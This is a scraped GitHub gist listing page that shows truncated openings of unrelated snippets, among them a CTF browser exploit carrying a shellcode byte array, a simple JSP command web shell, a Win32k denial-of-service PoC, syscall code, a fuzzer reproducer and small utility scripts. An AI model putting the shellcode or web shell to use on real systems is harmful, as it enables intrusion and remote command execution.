Skip to content

Instantly share code, notes, and snippets.

View AlirezaChegini's full-sized avatar
😁
I may be slow to respond.

nimaarek AlirezaChegini

😁
I may be slow to respond.
View GitHub Profile
acmnokigkgihogfbeooklgemindnbine is down
apgohnlmnmkblgfplgnlmkjcpocgfomp is down
apjnadhmhgdobcdanndaphcpmnjbnfng is down
bahkljhhdeciiaodlkppoonappfnheoi is down
bannaglhmenocdjcmlkhkcciioaepfpj is down
bgffinjklipdhacmidehoncomokcmjmh is down
bifdhahddjbdbjmiekcnmeiffabcfjgh is down
bjpknhldlbknoidifkjnnkpginjgkgnm is down
blngdeeenccpfjbkolalandfmiinhkak is down
ccdfhjebekpopcelcfkpgagbehppkadi is down
#pragma once
#define CONCAT_DETAIL(l, r) l##r
#define CONCAT(l, r) CONCAT_DETAIL(l, r)
#define COUNT_N(_0, _1, _2, _3, _4, _5, _6, _7, _8, _9, _10, N, ...) N
#define COUNT_M(...) EXPAND(COUNT_N( __VA_ARGS__, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0))
#define VA_NARGS(...) CALL(COUNT_M,(, __VA_ARGS__))
#define CALL(X,Y) X Y
#define EXPAND(...) __VA_ARGS__
#define CALL_N(N, X, V) CALL(CONCAT(N,X),(V))
@pgkt04
pgkt04 / syscalls.cpp
Last active August 27, 2022 08:37
calling x64 bit syscall with their ordinals
// make syscalls from their ordinals
#include <Windows.h>
#include <stdio.h>
#include <cstdint>
#include <vector>
struct syscall_bytes {
uint8_t
header[0x4] ,
@itszn
itszn / exploit.js
Last active April 9, 2021 18:29
Trendmicro CTF ChakraCore exploit
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
<html>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<meta content="utf-8" http-equiv="encoding">
<body onload="CreateListReaderIframe()">
<script>
function CreateListReaderIframe() {
var ifr = document.createElement("iframe");
@hfiref0x
hfiref0x / NtUserCreateActivationObject.cpp
Created November 2, 2018 07:40
Win32k NtUserCreateActivationObject Denial Of Service (19H1)
#include <iostream>
#include <conio.h>
#include <Windows.h>
typedef LONG(WINAPI *pNtUserCreateActivationObject)(
HWND hwnd,
ULONG_PTR Irrelevant1,
LUID *Luid);
HCRYPTPROV g_hCryptoProvider = NULL;
@nikallass
nikallass / cmd.jsp
Created April 30, 2018 16:54
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <stddef.h>
#include <stdint.h>
@Cauterite
Cauterite / soundcloud-dl-btn.user.js
Last active March 29, 2020 21:49
SoundCloud: Download Button
// ==UserScript==
// @name SoundCloud: Download Button
// @namespace e7fc358c1e5cc159ce3f327246807caa
// @include https://soundcloud.com/*
// @version 1.1
// @grant none
// @run-at document-idle
// ==/UserScript==
(function() {
@stefansundin
stefansundin / extract-attachments.py
Last active September 27, 2022 18:54
Extract attachments from emails that Gmail doesn't allow you to download. This is dumb. Please use Python >= 3.4.
#!/usr/bin/env python3
# Get your files that Gmail block. Warning message:
# "Anti-virus warning - 1 attachment contains a virus or blocked file. Downloading this attachment is disabled."
# Based on: https://spapas.github.io/2014/10/23/retrieve-gmail-blocked-attachments/
# Instructions:
# Go to your emails, click the arrow button in the top right, "Show original", then "Download Original".
# Move the files to the same directory as this program, then run it.
import sys